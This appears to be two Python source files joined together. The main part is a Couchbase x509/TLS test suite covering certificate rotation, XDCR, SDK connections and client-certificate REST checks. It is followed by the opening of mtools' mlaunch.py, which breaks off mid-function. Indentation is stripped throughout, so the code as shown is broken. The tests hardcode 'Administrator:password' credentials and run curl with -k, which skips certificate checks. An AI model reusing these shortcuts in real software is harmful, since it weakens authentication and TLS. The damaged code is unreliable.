restCluster1 = RestConnection(cluster1[0])
restCluster2 = RestConnection(cluster2[0])
try:
# Setup cluster1
x509main(cluster1[0])._upload_cluster_ca_certificate("Administrator", 'password')
x509main(cluster1[0])._setup_node_certificates()
x509main(cluster1[1])._setup_node_certificates(reload_cert=False)
restCluster1.add_node('Administrator', 'password', cluster1[1].ip)
known_nodes = ['ns_1@' + cluster1[0].ip, 'ns_1@' + cluster1[1].ip]
restCluster1.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(restCluster1), "Issue with rebalance")
restCluster1.create_bucket(bucket='default', ramQuotaMB=100)
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
restCluster2.add_node('Administrator', 'password', cluster2[1].ip)
known_nodes = ['ns_1@' + cluster2[0].ip, 'ns_1@' + cluster2[1].ip]
restCluster2.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(restCluster2), "Issue with rebalance")
restCluster2.create_bucket(bucket='default', ramQuotaMB=100)
test = x509main.CACERTFILEPATH + x509main.CACERTFILE
data = open(test, 'rb').read()
restCluster1.add_remote_cluster(cluster2[0].ip, cluster2[0].port, 'Administrator', 'password', remote_cluster_name, certificate=data)
self.sleep(20)
replication_id = restCluster1.start_replication('continuous', 'default', remote_cluster_name)
if replication_id is not None:
self.assertTrue(True, "Cannot create a replication")
finally:
known_nodes = ['ns_1@' + cluster2[0].ip, 'ns_1@' + cluster2[1].ip]
restCluster2.rebalance(known_nodes, ['ns_1@' + cluster2[1].ip])
self.assertTrue(self.check_rebalance_complete(restCluster2), "Issue with rebalance")
restCluster2.delete_bucket()
def test_xdcr_remote_ref_creation(self):
cluster1 = self.servers[0:2]
cluster2 = self.servers[2:4]
remote_cluster_name = 'sslcluster'
restCluster1 = RestConnection(cluster1[0])
restCluster2 = RestConnection(cluster2[0])
user = self.input.param("username", "Administrator")
password = self.input.param("password", "password")
try:
# Setup cluster1
x509main(cluster1[0]).setup_master()
x509main(cluster1[1])._setup_node_certificates(reload_cert=False)
restCluster1.create_bucket(bucket='default', ramQuotaMB=100)
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
# Setup cluster2
x509main(cluster2[0]).setup_master()
x509main(cluster2[1])._setup_node_certificates(reload_cert=False)
restCluster2.create_bucket(bucket='default', ramQuotaMB=100)
test = x509main.CACERTFILEPATH + x509main.CACERTFILE
data = open(test, 'rb').read()
# " -u {0}:{1}".format(user, password) + \
cmd = "curl -k -v -X POST -u Administrator:password" \
" --cacert " + self.root_ca_path + \
" --cert-type PEM --cert " + x509main().CLIENT_CERT_PEM + \
" --key-type PEM --key " + x509main().CLIENT_CERT_KEY + \
" -d name=" + remote_cluster_name + \
" -d hostname=" + cluster2[0].ip + ":" + self.rest_port +\
" -d username=" + user + \
" -d password=" + password + \
" -d demandEncryption=1" \
" --data-urlencode \"certificate={0}\"".format(data) + \
" {0}://Administrator:password@{1}:{2}/pools/default/remoteClusters"\
.format(self.protocol, self.master.ip, self.rest_port)
self.log.info("Command is {0}".format(cmd))
shell = RemoteMachineShellConnection(x509main.SLAVE_HOST)
output = shell.execute_command(cmd)
self.sleep(10)
'''
data = open(test, 'rb').read()
restCluster1.add_remote_cluster(cluster2[0].ip,cluster2[0].port,'Administrator','password',remote_cluster_name,certificate=data)
'''
replication_id = restCluster1.start_replication('continuous', 'default', remote_cluster_name)
if replication_id is not None:
self.assertTrue(True, "Replication was not created successfully")
finally:
restCluster2.delete_bucket()
def test_basic_ssl_test_invalid_cert(self):
x509main(self.master).setup_master()
status = x509main(self.master)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
# test sdk certs on a single node
def test_sdk(self):
rest = RestConnection(self.master)
x509main(self.master).setup_master()
rest.create_bucket(bucket='default', ramQuotaMB=100)
result = self._sdk_connection(host_ip=self.master.ip)
self.assertTrue(result, "Cannot create a security connection with server")
# test with sdk cluster using ca certs
def test_sdk_cluster(self):
rest = RestConnection(self.master)
x509main(self.master).setup_master()
for node in self.servers[1:]:
x509main(node).setup_master()
rest.create_bucket(bucket='default', ramQuotaMB=100)
servers_in = self.servers[1:]
self.cluster.rebalance(self.servers, servers_in, [])
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Cannot create a security connection with server")
def test_sdk_existing_cluster(self):
servers_in = self.servers[1:]
self.cluster.rebalance(self.servers, servers_in, [])
rest = RestConnection(self.master)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
rest.create_bucket(bucket='default', ramQuotaMB=100)
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Cannot create a security connection with server")
# Incorrect root cert
def test_sdk_cluster_incorrect_cert(self):
rest = RestConnection(self.master)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers)
rest.create_bucket(bucket='default', ramQuotaMB=100)
servers_in = self.servers[1:]
self.cluster.rebalance(self.servers, servers_in, [])
root_incorrect_ca_path = x509main.CACERTFILEPATH + x509main.INCORRECT_ROOT_CERT
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip, root_ca_path=root_incorrect_ca_path)
self.assertFalse(result, "Can create a security connection with incorrect root cert")
# Changing from root to self signed certificates
def test_sdk_change_ca_self_signed(self):
rest = RestConnection(self.master)
temp_file_name = x509main.CACERTFILEPATH + '/orig_cert.pem'
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers)
rest.create_bucket(bucket='default', ramQuotaMB=100)
result = self._sdk_connection(host_ip=self.master.ip)
self.assertTrue(result, "Cannot create a security connection with server")
rest.regenerate_cluster_certificate()
temp_cert = rest.get_cluster_ceritificate()
temp_file = open(temp_file_name, 'w')
temp_file.write(temp_cert)
temp_file.close()
result = self._sdk_connection(root_ca_path=temp_file_name, host_ip=self.master.ip)
self.assertTrue(result, "Cannot create a security connection with server")
# Changing from one root crt to another root crt when an existing connections exists
def test_root_crt_rotate_existing_cluster(self):
rest = RestConnection(self.master)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
rest.create_bucket(bucket='default', ramQuotaMB=100)
result, cb = self._sdk_connection(host_ip=self.master.ip)
create_docs = Thread(name='create_docs', target=self.createBulkDocuments, args=(cb,))
create_docs.start()
x509main(self.master)._delete_inbox_folder()
x509main(self.master)._generate_cert(self.servers, root_cn="CB\ Authority", type='openssl', client_ip=self.ip_address)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
create_docs.join()
result, cb = self._sdk_connection(host_ip=self.master.ip)
self.assertTrue(result, "Cannot create a security connection with server")
# Changing from one root crt to another root crt when an existing connections exists - cluster
def test_root_crt_rotate_cluster(self):
rest = RestConnection(self.master)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers)
rest.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(30)
servers_in = self.servers[1:]
self.cluster.rebalance(self.servers, servers_in, [])
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Can create a ssl connection with correct certificate")
result, cb = self._sdk_connection(host_ip=self.master.ip)
create_docs = Thread(name='create_docs', target=self.createBulkDocuments, args=(cb,))
create_docs.start()
x509main(self.master)._delete_inbox_folder()
x509main(self.master)._generate_cert(self.servers, root_cn="CB\ Authority", type='openssl', client_ip=self.ip_address)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
create_docs.join()
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Can create a ssl connection with correct certificate")
def test_root_crt_rotate_cluster_n2n(self):
update_level = self.input.param('update_level','all')
#ntonencryptionBase().change_cluster_encryption_cli(self.servers, 'control')
#ntonencryptionBase().ntonencryption_cli(self.servers, 'disable')
rest = RestConnection(self.master)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers)
rest.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(30)
servers_in = self.servers[1:]
self.cluster.rebalance(self.servers, servers_in, [])
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Can create a ssl connection with correct certificate")
result, cb = self._sdk_connection(host_ip=self.master.ip)
create_docs = Thread(name='create_docs', target=self.createBulkDocuments, args=(cb,))
create_docs.start()
x509main(self.master)._delete_inbox_folder()
x509main(self.master)._generate_cert(self.servers, root_cn="CB\ Authority", type='openssl', client_ip=self.ip_address)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
create_docs.join()
ntonencryptionBase().ntonencryption_cli(self.servers, 'enable')
ntonencryptionBase().change_cluster_encryption_cli(self.servers, update_level)
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Can create a ssl connection with correct certificate")
# Changing from self signed to ca signed, while there is a connection with self-signed
def test_root_existing_connection_rotate_cert(self):
rest = RestConnection(self.master)
rest.create_bucket(bucket='default', ramQuotaMB=100)
bucket = 'default'
self.add_built_in_server_user([{'id': bucket, 'name': bucket, 'password': 'password'}], \
[{'id': bucket, 'name': bucket, 'roles': 'admin'}], self.master)
self.sleep(30)
result = False
connection_string = 'couchbase://' + self.master.ip + '/default'
try:
cb = Bucket(connection_string, password='password')
if cb is not None:
result = True
except Exception as ex:
self.log.info("Exception is -{0}".format(ex))
self.assertTrue(result, "Cannot create a client connection with server")
create_docs = Thread(name='create_docs', target=self.createBulkDocuments, args=(cb,))
create_docs.start()
x509main(self.master).setup_master()
create_docs.join()
result = self._sdk_connection(host_ip=self.master.ip)
self.assertTrue(result, "Cannot create a security connection with server")
# Audit test to test /UploadClusterCA
def test_audit_upload_ca(self):
x509main(self.master).setup_master()
expectedResults = {"expires":"2049-12-31T23:59:59.000Z", "subject":"CN=Root Authority", "ip":self.ip_address, "port":57457, "source":"ns_server", \
"user":"Administrator"}
self.checkConfig(8229, self.master, expectedResults)
# Audit test for /reloadCA
def test_audit_reload_ca(self):
x509main(self.master).setup_master()
expectedResults = {"expires":"2049-12-31T23:59:59.000Z", "subject":"CN=" + self.master.ip, "ip":self.ip_address, "port":57457, "source":"ns_server", \
"user":"Administrator"}
self.checkConfig(8230, self.master, expectedResults)
# Common test case for testing services and other parameter
def test_add_node_with_cert_diff_services(self):
if self.enable_nton_local:
ntonencryptionBase().ntonencryption_cli(self.servers, 'enable')
ntonencryptionBase().change_cluster_encryption_cli(self.servers, self.local_clusterEncryption)
servs_inout = self.servers[1:4]
rest = RestConnection(self.master)
services_in = []
self.log.info ("list of services to be added {0}".format(self.services_in))
for service in self.services_in.split("-"):
services_in.append(service.split(":")[0])
self.log.info ("list of services to be added after formatting {0}".format(services_in))
for node in servs_inout:
x509main(node).setup_master(self.client_cert_state, self.paths,
self.prefixs, self.delimeters,
self.upload_json_mode)
# add nodes to the cluster
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], servs_inout, [],
services=services_in)
rebalance.result()
self.sleep(20)
# check for analytics services, for Vulcan check on http port
cbas_node = self.get_nodes_from_services_map(service_type='cbas')
if cbas_node is not None:
self.check_analytics_service(cbas_node)
# check if n1ql service, test it end to end
n1ql_node = self.get_nodes_from_services_map(service_type="n1ql")
if n1ql_node is not None:
self.check_query_api(n1ql_node)
# check if fts services, test it end to end
fts_node = self.get_nodes_from_services_map(service_type='fts')
if fts_node is not None:
self.check_fts_service(fts_node)
# check for kv service, test for /pools/default
kv_node = self.get_nodes_from_services_map(service_type='kv')
if kv_node is not None:
self.check_ns_server_rest_api(kv_node)
self.check_views_ssl(kv_node)
def check_ns_server_rest_api(self, host):
rest = RestConnection(host)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(10)
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers="", client_cert=True, curl=True)
else:
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=' -u Administrator:password ', client_cert=False, curl=True)
output = json.loads(output)
self.log.info ("Print output of command is {0}".format(output))
self.assertEqual(output['rebalanceStatus'], 'none', " The Web request has failed on port 18091 ")
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=None, client_cert=True, curl=True, verb='POST', data='memoryQuota=400')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=' -u Administrator:password ', client_cert=False, curl=True, verb='POST', data='memoryQuota=400')
if output == "":
self.assertTrue(True, "Issue with post on /pools/default")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=self.rest_port, headers=" -u Administrator:password ", client_cert=False, curl=True, verb='GET', plain_curl=True)
self.assertEqual(json.loads(output)['rebalanceStatus'], 'none', " The Web request has failed on port 8091 ")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=self.rest_port, headers=" -u Administrator:password ", client_cert=True, curl=True, verb='POST', plain_curl=True, data='memoryQuota=400')
if output == "":
self.assertTrue(True, "Issue with post on /pools/default")
def check_query_api(self, host):
rest = RestConnection(self.master)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(20)
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/query/service', port=18093, headers='', client_cert=True, curl=True, verb='GET', data="statement='create index idx1 on default(name)'")
else:
output = x509main()._execute_command_clientcert(host.ip, url='/query/service', port=18093, headers='-u Administrator:password ', client_cert=False, curl=True, verb='GET', data="statement='create index idx1 on default(name)'")
self.assertEqual(json.loads(output)['status'], "success", "Create Index Failed on port 18093")
output = x509main()._execute_command_clientcert(host.ip, url='/query/service', port=self.n1ql_port, headers='-u Administrator:password ', client_cert=False, curl=True, verb='GET', plain_curl=True, data="statement='create index idx2 on default(name)'")
self.assertEqual(json.loads(output)['status'], "success", "Create Index Failed on port 8093")
def check_fts_service(self, host):
rest = RestConnection(self.master)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
fts_ssl_port = 18094
self.sleep(20)
idx = {"sourceName": "default",
"sourceType": "couchbase",
"type": "fulltext-index"}
qry = {"indexName": "default_index_1",
"query": {"field": "type", "match": "emp"},
"size": 10000000}
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx', port=18094, headers=" -XPUT -H \"Content-Type: application/json\" ",
client_cert=True, curl=True, verb='GET', data="'" + json.dumps(idx) + "'")
else:
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx', port=18094, headers=" -XPUT -H \"Content-Type: application/json\" -u Administrator:password ",
client_cert=False, curl=True, verb='GET', data="'" + json.dumps(idx) + "'")
self.assertEqual(json.loads(output)['status'], "ok", "Issue with creating FTS index with client Cert")
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx01', port=self.fts_port, headers=" -XPUT -H \"Content-Type: application/json\" -u Administrator:password ",
client_cert=False, curl=True, verb='GET', data="'" + json.dumps(idx) + "'", plain_curl=True)
self.assertEqual(json.loads(output)['status'], "ok", "Issue with creating FTS index with client Cert")
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx', port=18094, headers=" -H \"Content-Type: application/json\" ",
client_cert=True, curl=True, verb='DELETE')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx', port=18094, headers=" -H \"Content-Type: application/json\" -u Administrator:password ",
client_cert=False, curl=True, verb='DELETE')
self.assertEqual(json.loads(output)['status'], "ok", "Issue with deleteing FTS index with client Cert")
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx01', port=self.fts_port, headers=" -H \"Content-Type: application/json\" -u Administrator:password ",
client_cert=False, curl=True, verb='DELETE', plain_curl=True)
self.assertEqual(json.loads(output)['status'], "ok", "Issue with deleteing FTS index on 8094")
''' - Check with FTS team on this
if self.client_cert_state == 'enable':
cmd = "curl -v --cacert " + self.root_ca_path + " --cert-type PEM --cert " + self.client_cert_pem + " --key-type PEM --key " + self.client_cert_key + \
" -H \"Content-Type: application/json\" " + \
"https://{0}:{1}/api/index/". \
format(host.ip, fts_ssl_port)
else:
cmd = "curl -v --cacert " + self.root_ca_path + \
" -H \"Content-Type: application/json\" " + \
" -u Administrator:password " + \
"https://{0}:{1}/api/index/". \
format(host.ip, fts_ssl_port)
self.log.info("Running command : {0}".format(cmd))
output = subprocess.check_output(cmd, shell=True)
print json.loads(output)
'''
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/api/stats', port=18094, headers='', client_cert=True, curl=True, verb='GET')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/api/stats', port=18094, headers=' -u Administrator:password ',
client_cert=False, curl=True, verb='GET')
self.assertEqual(json.loads(output)['manager']['TotPlannerKickErr'], 0, "Issues with FTS Stats API")
# Check for analytics service api, right now SSL is not supported for Analytics, hence http port
def check_analytics_service(self, host):
rest = RestConnection(self.master)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
cmd = "curl -k -v " + \
" -s -u Administrator:password --data pretty=true --data-urlencode 'statement=create dataset on default' " + \
"{0}://{1}:{2}/_p/cbas/query/service ". \
format(self.protocol, host.ip, self.rest_port)
self.log.info("Running command : {0}".format(cmd))
output = subprocess.check_output(cmd, shell=True)
self.assertEqual(json.loads(output)['status'], "success", "Create CBAS Index Failed")
def check_views_ssl(self, host):
rest = RestConnection(self.master)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/default/_design/dev_sample', port=18092, headers=' -XPUT ', client_cert=True, curl=True, verb='GET')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/default/_design/dev_sample', port=18092, headers=' -XPUT -u Administrator:password ', client_cert=False, curl=True, verb='GET')
if self.client_cert_state == 'enable':
self.assertEqual(json.loads(output)['reason'], "Content is not json.", "Create View Index Failed")
else:
self.assertEqual(json.loads(output)['error'], "invalid_design_document", "Create Index Failed")
# " https://{0}:{1}/default/_design/dev_sample -d '{\"views\":{\"sampleview\":{\"map\":\"function (doc, meta){emit(doc.emailId,meta.id, null);\n}\"}}, \"options\": {\"updateMinChanges\": 3, \"replicaUpdateMinChanges\": 3}}'". \
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/default/_design/dev_sample/_view/sampleview', port=18092, headers='', client_cert=True, curl=True, verb='POST')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/default/_design/dev_sample/_view/sampleview', port=18092, headers=' -u Administrator:password ', client_cert=False, curl=True, verb='POST')
self.assertEqual(json.loads(output)['error'], "not_found", "Create View Index Failed")
def test_rest_api_disable(self):
host = self.master
rest = RestConnection(self.master)
rest.create_bucket(bucket='default', ramQuotaMB=100)
status, output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers="", client_cert=True, curl=False)
self.assertEqual(status, 401, "Issue with client cert with, user should not able to access via client cert")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=" -u Administrator:password ", client_cert=False, curl=True)
self.assertEqual(json.loads(output)['rebalanceStatus'], 'none', " The Web request has failed on port 18091 ")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=self.rest_port, headers=" -u Administrator:password ", client_cert=False, curl=True, verb='GET', plain_curl=True)
self.assertEqual(json.loads(output)['rebalanceStatus'], 'none', " The Web request has failed on port 18091 ")
def test_rest_api_mandatory(self):
host = self.master
rest = RestConnection(self.master)
rest.create_bucket(bucket='default', ramQuotaMB=100)
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers="", client_cert=True, curl=True)
self.assertEqual(json.loads(output)['name'], 'default', " The Web request has failed on port 18091 ")
cmd = "curl -v --cacert " + self.root_ca_path + \
" -u Administrator:password https://{0}:{1}/pools/default". \
format(self.master.ip, '18091')
self.log.info("Running command : {0}".format(cmd))
try:
output = subprocess.check_output(cmd, shell=True)
except:
self.assertTrue(True, "CA Cert works with mandatory")
if CbServer.use_https:
plain_curl = False
else:
plain_curl = True
status, output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=self.rest_port, headers=" -u Administrator:password ", client_cert=False, curl=False, verb='GET', plain_curl=plain_curl)
self.assertEqual(status, 401, "Invalid user gets authenticated successfully")
def test_incorrect_user(self):
host = self.master
rest = RestConnection(self.master)
rest.create_bucket(bucket='default', ramQuotaMB=100)
status = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers="", client_cert=True, curl=False)
self.assertEqual(status[0], 'error' , "Invalid user gets authenticated successfully")
def test_upload_json_tests(self):
rest = RestConnection(self.master)
x509main(self.master).write_client_cert_json_new(self.client_cert_state, self.paths, self.prefixs, self.delimeters)
status, content = x509main(self.master)._upload_cluster_ca_settings("Administrator", "password")
if "Invalid value 'subject.test' for key 'path'" in content:
self.assertTrue(True, " Correct error message for key path")
'''
class x509_upgrade(NewUpgradeBaseTest):
def setUp(self):
super(x509_upgrade, self).setUp()
self.initial_version = self.input.param("initial_version", '4.5.0-900')
self.upgrade_version = self.input.param("upgrade_version", "4.5.0-1069")
self.ip_address = '172.16.1.174'
self.root_ca_path = x509main.CACERTFILEPATH + x509main.CACERTFILE
self.client_cert_pem = x509main.CACERTFILEPATH + self.ip_address + ".pem"
self.client_cert_key = x509main.CACERTFILEPATH + self.ip_address + ".key"
# Input parameters for state, path, delimeters and prefixes
self.client_cert_state = self.input.param("client_cert_state", "disable")
self.paths = self.input.param('paths', "subject.cn:san.dnsname:san.uri").split(":")
self.prefixs = self.input.param('prefixs', 'www.cb-:us.:www.').split(":")
self.delimeters = self.input.param('delimeter', '.:.:.') .split(":")
self.setup_once = self.input.param("setup_once", False)
SSLtype = self.input.param("SSLtype", "openssl")
encryption_type = self.input.param('encryption_type', "")
key_length = self.input.param("key_length", 1024)
self.dns = self.input.param('dns', None)
self.uri = self.input.param('uri', None)
copy_servers = copy.deepcopy(self.servers)
self._reset_original()
if (self.dns is not None) or (self.uri is not None):
x509main(self.master)._generate_cert(copy_servers, type=SSLtype, encryption=encryption_type, key_length=key_length, client_ip=self.ip_address, alt_names='non_default', dns=self.dns, uri=self.uri)
else:
x509main(self.master)._generate_cert(copy_servers, type=SSLtype, encryption=encryption_type, key_length=key_length, client_ip=self.ip_address)
self.log.info(" Path is {0} - Prefixs - {1} -- Delimeters - {2}".format(self.paths, self.prefixs, self.delimeters))
if (self.setup_once):
x509main(self.master).setup_master(self.client_cert_state, self.paths, self.prefixs, self.delimeters)
x509main().setup_cluster_nodes_ssl(self.servers)
enable_audit = self.input.param('audit', None)
if enable_audit:
Audit = audit(host=self.master)
currentState = Audit.getAuditStatus()
self.log.info ("Current status of audit on ip - {0} is {1}".format(self.master.ip, currentState))
if not currentState:
self.log.info ("Enabling Audit ")
Audit.setAuditEnable('true')
self.sleep(30)
def tearDown(self):
self._reset_original()
super(x509_upgrade, self).tearDown()
def _reset_original(self):
self.log.info ("Reverting to original state - regenerating certificate and removing inbox folder")
for servers in self.servers:
rest = RestConnection(servers)
rest.regenerate_cluster_certificate()
x509main(servers)._delete_inbox_folder()
def check_rest_api(self, host):
rest = RestConnection(host)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(10)
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers="", client_cert=True, curl=True)
else:
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=' -u Administrator:password ', client_cert=False, curl=True)
output = json.loads(output)
self.log.info ("Print output of command is {0}".format(output))
self.assertEqual(output['rebalanceStatus'], 'none', " The Web request has failed on port 18091 ")
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=None, client_cert=True, curl=True, verb='POST', data='memoryQuota=400')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=' -u Administrator:password ', client_cert=False, curl=True, verb='POST', data='memoryQuota=400')
if output == "":
self.assertTrue(True, "Issue with post on /pools/default")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=8091, headers=" -u Administrator:password ", client_cert=False, curl=True, verb='GET', plain_curl=True)
self.assertEqual(json.loads(output)['rebalanceStatus'], 'none', " The Web request has failed on port 8091 ")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=8091, headers=" -u Administrator:password ", client_cert=True, curl=True, verb='POST', plain_curl=True, data='memoryQuota=400')
if output == "":
self.assertTrue(True, "Issue with post on /pools/default")
def _sdk_connection(self, root_ca_path=x509main.CACERTFILEPATH + x509main.CACERTFILE, bucket='default', host_ip=None, sdk_version='pre-vulcan'):
self.sleep(30)
result = False
self.add_built_in_server_user([{'id': bucket, 'name': bucket, 'password': 'password'}], \
[{'id': bucket, 'name': bucket, 'roles': 'admin'}], self.master)
if sdk_version == 'pre-vulcan':
connection_string = 'couchbases://' + host_ip + '/' + bucket + '?certpath=' + root_ca_path
self.log.info("Connection string is -{0}".format(connection_string))
try:
cb = Bucket(connection_string, password='password')
if cb is not None:
result = True
return result, cb
except Exception as ex:
self.log.info("Expection is -{0}".format(ex))
elif sdk_version == 'vulcan':
self.add_built_in_server_user([{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}], \
[{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}], self.master)
key_file = x509main.CACERTFILEPATH + self.ip_address + ".key"
chain_file = x509main.CACERTFILEPATH + "/long_chain" + self.ip_address + ".pem"
connection_string = 'couchbases://' + host_ip + '/?certpath=' + chain_file + "&keypath=" + key_file
self.log.info("Connection string is -{0}".format(connection_string))
try:
cluster = Cluster(connection_string);
cb = cluster.open_bucket(bucket)
if cb is not None:
result = True
return result, cb
except Exception as ex:
self.log.info("Expection is -{0}".format(ex))
return result
def upgrade_all_nodes(self):
servers_in = self.servers[1:]
self._install(self.servers)
rest_conn = RestConnection(self.master)
rest_conn.init_cluster(username='Administrator', password='password')
rest_conn.create_bucket(bucket='default', ramQuotaMB=512)
self.cluster.rebalance(self.servers, servers_in, [])
upgrade_threads = self._async_update(upgrade_version=self.upgrade_version, servers=self.servers)
for threads in upgrade_threads:
threads.join()
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Cannot create a security connection with server")
self.check_rest_api(server)
def upgrade_half_nodes(self):
serv_upgrade = self.servers[2:4]
servers_in = self.servers[1:]
self._install(self.servers)
rest_conn = RestConnection(self.master)
rest_conn.init_cluster(username='Administrator', password='password')
rest_conn.create_bucket(bucket='default', ramQuotaMB=512)
self.cluster.rebalance(self.servers, servers_in, [])
upgrade_threads = self._async_update(upgrade_version=self.upgrade_version, servers=serv_upgrade)
for threads in upgrade_threads:
threads.join()
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertFalse(result, "Can create a security connection with server")
def upgrade_all_nodes_4_6_3(self):
servers_in = self.servers[1:]
self._install(self.servers)
rest_conn = RestConnection(self.master)
rest_conn.init_cluster(username='Administrator', password='password')
rest_conn.create_bucket(bucket='default', ramQuotaMB=512)
self.cluster.rebalance(self.servers, servers_in, [])
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
upgrade_threads = self._async_update(upgrade_version=self.upgrade_version, servers=self.servers)
for threads in upgrade_threads:
threads.join()
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Cannot create a security connection with server")
result = self._sdk_connection(host_ip=server.ip, sdk_version='vulcan')
self.assertTrue(result, "Cannot create a security connection with server")
self.check_rest_api(server)
'''
|
mlaunch.py
|
#!/usr/bin/env python
import Queue
import argparse
import subprocess
import threading
import os, time, sys, re
import socket
import json
import re
import warnings
import psutil
import signal
from collections import defaultdict
from mtools.util import OrderedDict
from operator import itemgetter, eq
from mtools.util.cmdlinetool import BaseCmdLineTool
from mtools.util.print_table import print_table
from mtools.version import __version__
try:
try:
from pymongo import MongoClient as Connection
from pymongo import MongoReplicaSetClient as ReplicaSetConnection
from pymongo import version_tuple as pymongo_version
from bson import SON
from StringIO import StringIO
from distutils.version import LooseVersion
except ImportError:
from pymongo import Connection
from pymongo import ReplicaSetConnection
from pymongo import version_tuple as pymongo_version
from bson import SON
from pymongo.errors import ConnectionFailure, AutoReconnect, OperationFailure, ConfigurationError
except ImportError:
raise ImportError("Can't import pymongo. See http://api.mongodb.org/python/current/ for instructions on how to install pymongo.")
# wrapper around Connection (itself conditionally a MongoClient or
# pymongo.Connection) to specify timeout if pymongo >= 3.0
class MongoConnection(Connection):
def __init__(self, *args, **kwargs):
if pymongo_version[0] >= 3:
if not 'serverSelectionTimeoutMS' in kwargs:
kwargs['serverSelectionTimeoutMS'] = 1
else:
if 'serverSelectionTimeoutMS' in kwargs:
kwargs.remove('serverSelectionTimeoutMS')
Connection.__init__(self, *args, **kwargs)
def wait_for_host(port, interval=1, timeout=30, to_start=True, queue=None):
""" Ping a mongos or mongod every `interval` seconds until it responds, or `timeout` seconds have passed. If `to_start`
is set to False, will wait for the node to shut down instead. This function can be called as a separate thread.
If queue is provided, it will place the results in the message queue and return, otherwise it will just return the result
directly.
"""
host = 'localhost:%i'%port
startTime = time.time()
while True:
if (time.time() - startTime) > timeout:
if queue:
